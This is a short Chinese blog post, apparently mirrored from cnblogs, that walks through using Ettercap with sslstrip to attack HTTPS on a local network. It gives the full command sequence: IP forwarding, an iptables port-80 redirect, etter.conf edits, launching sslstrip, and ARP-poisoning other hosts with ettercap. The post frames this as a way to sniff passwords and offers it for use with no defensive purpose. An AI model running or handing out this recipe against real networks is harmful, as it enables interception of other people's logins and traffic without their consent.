zoukankan      html  css  js  c++  java
  • Ettercap结合sslstrip对ssl/https进行攻击

       

            Ettercap是一个非常强大的嗅探欺骗工具;在以往的ettercap的使用过程中,我们大多用来嗅探http,ftp,和一些加密比较简单的邮箱等的密码,对于新型的ssl/https等的加密协议就显得不是太完美;这里我们使用一款专门针对ssl/https加密协议的工具配合Ettercap进行局域网嗅探欺骗:sslstrip。

           以下方法均来自互联网,这里只是记录一下笔者自己使用过程!

     

    1.开启转发:

    echo "1">/proc/sys/net/ipv4/ip_forward

    2.iptables过滤数据包

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

    还有一种方式:修改/etc/ettercap/etter.conf

    去掉# if you use iptables:

       redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

       redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

    的两个注释即可

    3.监听转发端口

    sslstrip -l 10000 

    4.arp嗅探

    ettercap -T -q -i wlan0 -M arp:remote // //

     

       

       

       

    视频:

    清晰版下载地址:http://pan.baidu.com/s/1qWJbFrA

  • 相关阅读:
    ASP.NET应用程序与页面生命周期
    Git源码管控规范
    redis cluster
    jwt token and shiro
    openapi and light-4j
    ps 证件照制作
    js eval 动态内容生成
    pdnovel 看书 读书 听书
    crawler 使用jQuery风格实现
    websocket聊天体验(二)
  • 原文地址:https://www.cnblogs.com/h4ck0ne/p/5154688.html
Copyright © 2011-2022 走看看